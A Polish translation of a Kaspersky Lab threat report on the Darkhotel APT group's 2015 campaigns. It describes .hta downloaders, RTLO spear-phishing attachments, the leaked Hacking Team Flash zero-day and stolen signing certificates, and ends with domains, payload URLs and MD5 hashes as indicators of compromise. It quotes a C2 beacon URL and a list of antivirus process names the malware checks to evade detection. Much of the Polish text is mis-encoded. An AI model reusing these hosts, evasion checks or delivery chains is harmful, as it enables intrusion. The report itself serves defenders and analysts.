Ataki APT przeprowadzane przez ugrupowanie Darkhotel w 2014 roku i wczeÅ›niej charakteryzujÄ… siÄ™ wykorzystaniem skradzionych certyfikatów, umieszczaniem plików .hta przy użyciu różnych technik oraz stosowaniem nietypowym metod, takich jak infiltracja hotelowej sieci Wi-Fi w celu umieszczenia backdoorów w atakowanym systemach. Wiele z tych technik i dziaÅ‚aÅ„ byÅ‚o nadal wykorzystywanych w 2015 r. JednoczeÅ›nie, oprócz nowych wariantów szkodliwych plików .hta, doszÅ‚y nowe ofiary, zaÅ‚Ä…czniki .rar ze spear phishingiem RTLO oraz lokowanie exploitów 0-day grupy Hacking Team.      

Grupa Darkhotel nadal atakuje cele na caÅ‚ym Å›wiecie przy użyciu spear phishingu, jednak zwiÄ™kszyÅ‚a swój zasiÄ™g geograficzny w stosunku do wczeÅ›niejszych ataków na hotelowe sieci Wi-Fi oraz ataków majÄ…cych na celu rozbudowÄ™ botnetu. Niektóre z jej celów dotyczÄ… krÄ™gów dyplomatycznych lub strategicznych interesów handlowych. 

Lokalizacja celów i ofiar grupy Darkhotel w 2015 r.:

• Korea Północna
• Rosja
• Korea PoÅ‚udniowa
• Japonia
• Bangladesz
• Tajlandia
• Indie
• Mozambik
• Niemcy

Strony zwiÄ…zane z plikami .hta, backdoorami, exploitami i C2 wykorzystywane przez Darkhotel w 2015 r.:

• storyonboard[.]net
• tisone360[.]org
• openofficev[.]info
• saytargetworld[.]net
• error-page[.]net
• eonlineworld[.]net
• enewsbank[.]net
• thewordusrapid[.]com

Podzbiór nazw załączników w incydentach spear phishingu w 2015 r.:

• schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
• schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
• congratulation.rar -> congratulation_?gpj.scr
• letter.rar -> letter_?gpj.scr

Konsekwentne wykorzystywanie zaciemnionych downloaderów .hta

Niezależnie od tego, czy do infekcji dochodzi przy użyciu ataków typu spear phishing, uzyskania fizycznego dostÄ™pu do systemu czy exploita zero-day grupy Hacking Team dla Flasha, czÄ™sto można wyróżnić tÄ™ samÄ… metodÄ™ komunikacji nowo zainfekowanego systemu z centrum kontroli Darkhotel: 

Lekko zaciemniony skrypt znajdujÄ…cy siÄ™ w pliku .hta zapisuje plik wykonywalny na dysku i wykonuje go.

Ciekawe jest to, że grupa ta od wielu lat umieszcza kod backdoorów i downloaderów w postaci plików .hta. W 2010 r. wykorzystała artykuły dotyczące Korei Północnej stworzone przez amerykański Brookings Institute, aby zaatakować cele związane z Koreą Północną przy pomocy szkodliwego kodu ukrytego w plikach .hta. Ponadto, odsyłacze prowadzące do szkodliwych plików .hta wysyłała za pośrednictwem poczty e-mail grupom turystycznym z Korei Północnej, ekonomistom zainteresowanym Koreą Północną i innym. Wykorzystywanie w tak dużym stopniu starszej technologii specyficznej dla Windowsa, takiej jak aplikacje HTML wprowadzone przez Microsoft w 1999 r., wydaje się nieco dziwne.

Z sendspace.servermsys.com/downloader.hta:

Po wykonaniu i modyfikacji kilku zmiennych .hta wykorzystuje stare komponenty Adodb.stream, aby zapisać ciÄ…g przepuszczony przez funkcjÄ™ XOR 0x3d jako plik wykonywalny, i uruchamia go.  

Kod ten powoduje wykonanie "internet_explorer_Smart_recovery.exe" 054471f7e168e016c565412227acfe7f, nastÄ™pnie ukryte okno przeglÄ…darki kontaktuje siÄ™ ze swoim centrum kontroli (C2). W tym przypadku, wyglÄ…da na to, że operatorzy Darkhotel sprawdzajÄ…, czy Internet Explorer jest domyÅ›lnÄ… przeglÄ…darkÄ… ofiary, ponieważ wszystkie wersje IE zwracajÄ… wartość "0", a dla pozostaÅ‚ych przeglÄ…darek "appMinorVersion" pozostaje niezdefiniowany. Ten zbiór danych wydaje siÄ™ nieco dziwny, ponieważ pliki .hta sÄ… obsÅ‚ugiwane i uruchamiane przez mshta.exe tylko w systemach Windows. Być może jest to artefakt z wczeÅ›niejszych etapów rozwoju kodu. Ostatnia wersja to:    
"hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=" + navigator.appMinorVersion + "

Plik "internet_explorer_Smart_recovery.exe" jest prostym zaciemnionym downloaderem. Seria pÄ™tli XOR 0x28 deszyfruje zawartość samo kasujÄ…cego siÄ™ pliku wsadowego, który jest nastÄ™pnie zapisywany na dysku i wykonywany. Później bardziej zÅ‚ożona pÄ™tla RC4 deszyfruje URL downloadera oraz inne ciÄ…gi. 

 

Kiedy proces ten zostanie zakoÅ„czony, ciÄ…g URL ma postać http://sendspace.servermsys.com/wnctprx. Pik jest pobierany (b1f56a54309147b07dda54623fecbb89) do pliku .tmp w folderze %temp%, wykonywany, a nastÄ™pnie downloader koÅ„czy dziaÅ‚anie. Ten wiÄ™kszy plik to backdoor/downloader, który zawiera funkcjonalność SSH i wrzuca swoje klucze na dysk w celu umożliwienia komunikacji SSH. ZnaleźliÅ›my starsze programy Darkhotel sÅ‚użące do kradzieży informacji, które zostaÅ‚y wrzucone i uruchomione w systemie przez te downloadery.      

Spearphishing oraz załączniki .rar z RTLO

Ugrupowanie APT o nazwie Darkhotel przeprowadza nieustajÄ…ce ataki typu spear phishing na swoje cele w celu wÅ‚amania siÄ™ do systemów. Niektóre cele sÄ… atakowane wielokrotnie przy użyciu niemalże tej samej metody socjotechniki. Na przykÅ‚ad, zaÅ‚Ä…cznik "schedule(2.11~16).rar" mógÅ‚ zostać wysÅ‚any 10 lutego, a nastÄ™pnie Darkhotel zaatakowaÅ‚ te same cele w drugim podejÅ›ciu pod koniec maja, stosujÄ…c zaÅ‚Ä…cznik "schedule(6.1~6).rar".   

Konsekwentnie archiwizuje pliki wykonywalne RTLO .scr przy pomocy archiwów .rar, tak aby cel ataków myÅ›laÅ‚, że ma do czynienia z nieszkodliwymi plikami .jpg. Te pliki wykonywalne to lekkie droppery, zawierajÄ…ce sÅ‚użące za przynÄ™tÄ™ pliki jpeg oraz kod w celu stworzenia downloadera Ink. 

Gdy cel ataku próbuje otworzyć rzekomy plik jpg, zostaje uruchomiony kod wykonywalny i wrzuca obraz jpg na dysk, nastÄ™pnie otwiera go przy użyciu mspaint.exe w tle. Ten dokument "z gratulacjami" jest w jÄ™zyku koreaÅ„skim, co ujawnia prawdopodobnÄ… cechÄ™ profilu ofiary. 

W czasie, gdy wyÅ›wietlany jest obraz, kod zrzuca na dysk i uruchamia nietypowy skrót mspaint.lnk. Skrót ten zawiera wielowierszowy skrypt powÅ‚oki. Technika ta jest również wykorzystywana przez inne grupy APT jako mechanizm przetrwania. Plik Ink o rozmiarze 64kb jest kodem downloadera:      

Gdy plik Ink zostanie wykonywany, zaczyna oparty na technologii AJAX proces pobierania dla pliku "unzip.js" (a07124b65a76ee7d721d746fd8047066) na openofficev.info. Jest to kolejny plik wscript implementujÄ…cy technologiÄ™ AJAX w celu pobrania i wykonania stosunkowo dużego skompilowanego pliku wykonywalnego:  

Ten kod wykonywalny jest zapisywany i wykonywany w %temp%\csrtsrm.exe. Jest to stosunkowo duży plik wykonywalny (~1.2 MB), który wstrzykuje szkodliwy kod i umieszcza zdalne wÄ…tki w legalnych procesach.   

Skradzione certyfikaty i unikanie wykrycia

Wygląda na to, że grupa gromadzi skradzione certyfikaty i rozmieszcza podpisane nimi downloadery i backdoory. Niektóre z odwołanych niedawno certyfikatów należą do Xuchang Hongguang Technology Co. Ltd.

Obecnie Darkhotel zwykle ukrywa swój kod pod warstwami szyfrowania. Możliwe, że powoli przystosowaÅ‚ siÄ™ do atakowania lepiej chronionych Å›rodowisk i woli nie palić tych skradzionych certyfikatów cyfrowych. We wczeÅ›niejszych atakach wykorzystaÅ‚by po prostu dÅ‚ugÄ… listÄ™ sÅ‚abo zaimplementowanych, zÅ‚amanych certyfikatów. 

Nie tylko stosuje mocniejsze techniki zaciemniania, ale również rozszerza swojÄ… listÄ™ stosowanych technologii ochrony przed wykryciem. Na przykÅ‚ad ten podpisany downloader (d896ebfc819741e0a97c651de1d15fec) odszyfrowuje zestaw ciÄ…gów antywirusowych etapami w celu zidentyfikowania technologii ochrony w nowo zainfekowanym systemie, a nastÄ™pnie otwiera każdy proces, szukajÄ…c pasujÄ…cej nazwy obrazu:  

c:\avast! sandbox\WINDOWS\system32\kernel32.dll - Avast!
avp.exe - Kaspersky Lab
mcagent.exe;mcuicnt.exe - Intel/Mcafee
bdagent.exe - BitDefender
ravmon.exe,ravmond.exe - Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe - Qihoo 360
ayagent.aye,avguard.;avgntsd.exe - Avira Antivirus
ccsvchst.exe,nis.exe - Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe - Avast!
msseces.exe;msmpeng.exe - Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe - G-Data
avas.exe - TrustPort AV
tptray.exe - Toshiba utility
fsma32.exe;fsorsp.exe - F-Secure
econser.exe;escanmon.exe - Microworld Technologies eScan
SrvLoad.exe;PSHost.exe - Panda Software
egui.exe;ekrn.exe - ESET Smart Security
pctsSvc.exe;pctsGui.exe - PC Tools Spyware Doctor
casc.exe;UmxEngine.exe - CA Security Center
cmdagent.exe;cfp.exe - Comodo
KVSrvXP.exe;KVMonXP.exe - Jiangmin Antivirus
nsesvc.exe;CClaw.exe - Norman
V3Svc.exe - Ahnlab
guardxup. - IKARUSF
ProtTray. - F-Prot
op_mon - Agnitum Outpost
vba332ldr.;dwengine. - DrWeb

Nawet informacje identyfikacyjne, których backdoor szuka w systemie, nie zostajÄ… odszyfrowane do czasu uruchomienia. Podobnie jak program kradnÄ…cy informacje, o którym pisaliÅ›my w naszym poprzednim raporcie technicznym dotyczÄ…cym Darkhotel, komponent ten próbuje ukraść zestaw danych, za pomocÄ… których można zidentyfikować zainfekowany system. Spora część informacji jest zbierana przy użyciu tego samego zestawu wywoÅ‚aÅ„, tj. kernel32.GetDefaultSystemLangID, kernel32.GetVersion oraz kernel32.GetSystemInfo:    

• DomyÅ›lna strona kodowa systemu
• Informacje dotyczÄ…ce karty sieciowej
• Architektura procesora
• Nazwa hosta i adres IP
• Wersje systemu Windows i Service Pack

Zasadniczo, duża część kodu tego programu służącego do kradzieży informacji jest taka sama jak w przypadku wcześniejszych ataków.

Tisone360.com, odwiedziny i exploit 0-day Hacking Team

Szczególnie interesujÄ…ca byÅ‚a dla nas strona tisone360.com. W kwietniu 2015 r. Darkhotel wysyÅ‚aÅ‚ wiadomoÅ›ci phishingowe zawierajÄ…ce odsyÅ‚acze do wczeÅ›niejszych exploitów dla Flasha, a nastÄ™pnie, na poczÄ…tku lipca, zaczÄ…Å‚ rozprzestrzeniać exploita 0-day, który wyciekÅ‚ grupie Hacking Team.      

Wygląda na to, że grupa APT o nazwie Darkhotel mogła wykorzystywać tego exploita w celu atakowania określonych systemów. "tisone360.com" może pomóc zidentyfikować niektóre z jej działań. Strona ta działała jeszcze 22 lipca 2015 r. Wygląda jednak na to, że jest to niewielka część jej aktywności. Oprócz 0-day icon.swf HT (214709aa7c5e4e8b60759a175737bb2b) w kwietniu strona "tisone360.com" dostarczała prawdopodobnie również exploita CVE-2014-0497 dla Flasha. W styczniu 2014 r. poinformowaliśmy o luce związanej z tym exploitem firmę Adobe, gdy była wykorzystywana przez grupę APT o nazwie Darkhotel.

Niedawno grupa Darkhotel utrzymywała na tej stronie wiele działających katalogów.

Najaktywniejszy jest katalog ims2. Zawiera zestaw backdoorów oraz exploitów. Najciekawszym z nich jest exploit 0-day dla Flasha, który wyciekÅ‚ grupie Hacking Team, icon.swf. Po tym, jak o serwerze tym poinformowano publicznie, grupa Darkhotel powoli uszczelniÅ‚a otwarty dostÄ™p do /ims2/. Mimo to jego zawartość nadal byÅ‚a aktywnie wykorzystywana.    

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg
(42a837c4433ae6bd7490baec8aeb5091)
-> %temp%\RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Gdy icon.jpg zostanie pobrany przez exploita dla Flasha, zostaje odszyfrowany przy użyciu wielobajtowego klucza XOR 0xb369195a02. NastÄ™pnie pobiera kolejne komponenty.   

Warto zauważyć, że grupa ta prawdopodobnie zmienia kompilacjÄ™ i znaczniki czasowe konsolidatora swojego kodu wykonywalnego na daty z 2013 r. Można zauważyć to w licznych próbkach, które zostaÅ‚y zaobserwowane po raz pierwszy w poÅ‚owie 2015 r., Å‚Ä…cznie z downloaderem icon.jpg. 

Z dziennika odwiedzin katalogu tej strony wynika, że katalog został stworzony 8 lipca. 8 i 9 lipca odnotowano kilka odwiedzin konkretnego adresu URL na serwerze z pięciu systemów zlokalizowanych w wyszczególnionych niżej miejscach. Kilka z nich stanowi prawdopodobnie cel Darkhotel:

• Niemcy
• Korea PoÅ‚udniowa
• Chiny
• US
• Japonia

Jednak jeden z tych systemów odwiedziÅ‚ tÄ™ stronÄ™ 9 lipca prawie 12 000 razy w ciÄ…gu 30 minut. Tak duży ruch stanowi prawdopodobnie próbÄ™ zbadania tego zasobu, nie zaÅ› atak DoS:  

Zarejestrowane odwiedziny na stronie po 9 lipca nie sÄ… wiarygodne i mogÄ… odpowiadać za nie kolejni badacze, którzy zainteresowali siÄ™ tym zasobem po publikacji raportów 9 lipca. Wiele spoÅ›ród tych okoÅ‚o 50 odwiedzin pochodziÅ‚o z podzbioru wskazanych wyżej systemów i zostaÅ‚o wielokrotnie powtórzonych. Odwiedziny dokonane z poniższych lokalizacji odnotowano 10 lub później:    

• Niemcy (prawdopodobnie badanie)
• Ukraina (prawdopodobnie badanie)
• Amazon Web Services, wiele lokalizacji (prawdopodobnie badanie)
• Googlebot, wiele lokalizacji
• US
• Irlandia (prawdopodobnie badanie)
• Rosja
• Brazylia
• Chiny
• Finlandia
• Kanada
• Tajwan
• Francja (prawdopodobnie badanie)
• Republika Czeska

Konsekwentny strumień ataków

Grupa Darhotel zwykle trzyma siÄ™ tego, co dziaÅ‚a. Na przykÅ‚ad przez lata wielokrotnie stosowaÅ‚a ataki typu spear phishing z wykorzystaniem plików .hta. W 2015 r. zaobserwowaliÅ›my wielokrotne wykorzystanie kreatywnego Å‚aÅ„cucha dostarczania komponentów, jak miaÅ‚o to miejsce w przypadku strony tisone360.com.  

downloader -> zaewidencjonowanie hta -> program wykradający informacje -> więcej
skompilowanych komponentów.
dropper -> skrypt wsh -> skrypt wsh -> program wykradający informacje -> więcej
skompilowanych komponentów
spearphish -> dropper -> zaewidencjonowanie hta -> downloader -> program
wykradajÄ…cy informacje

O ile łańcuch dostarczania, który obejmuje zaciemnione skrypty wewnątrz plików .hta, zauważyliśmy już w 2011 r., nasilenie nastąpiło w 2014 r. i teraz w 2015 r.

openofficev[.]info (2015)
office-revision[.]com (2014)
online.newssupply[.]net (2011)

WÅ‚amania do infrastruktury na widoku

Omawiana grupa staÅ‚a siÄ™ czujniejsza jeÅ›li chodzi o prowadzenie swoich stron, uszczelniajÄ…c konfiguracjÄ™ i zawartość odpowiedzi. Obecnie jej centrum kontroli (C2) odpowiada przy użyciu obrazów "Drinky Crow" z kreskówki opartej na komiksie Maakies:  

Inne centra kontroli Darkhotel zwykle nie różniÄ… siÄ™ od losowych stron w Internecie w przypadku odwiedzenia niepoprawnych lub nieistniejÄ…cych stron. SÄ… to obrazy z serwisu FOTOLIA lub artykuÅ‚y dotyczÄ…ce twórców lodów:  

md5 HTA:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

md5 załączników spearphish:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (po raz pierwszy zauważony pod koniec 2014 r.,
wykorzystywany w 2015 r.)

e85e0365b6f77cc2e9862f987b152a89 (po raz pierwszy zauważony pod koniec 2014 r.,
wykorzystywany w 2015 r.)

md5 dużego downloadera 2015:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Program wykradajÄ…cy informacje wrzucony w 2015 r.

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Sub-hosty i adresy url:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html 
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

ŹródÅ‚o: Kaspersky Lab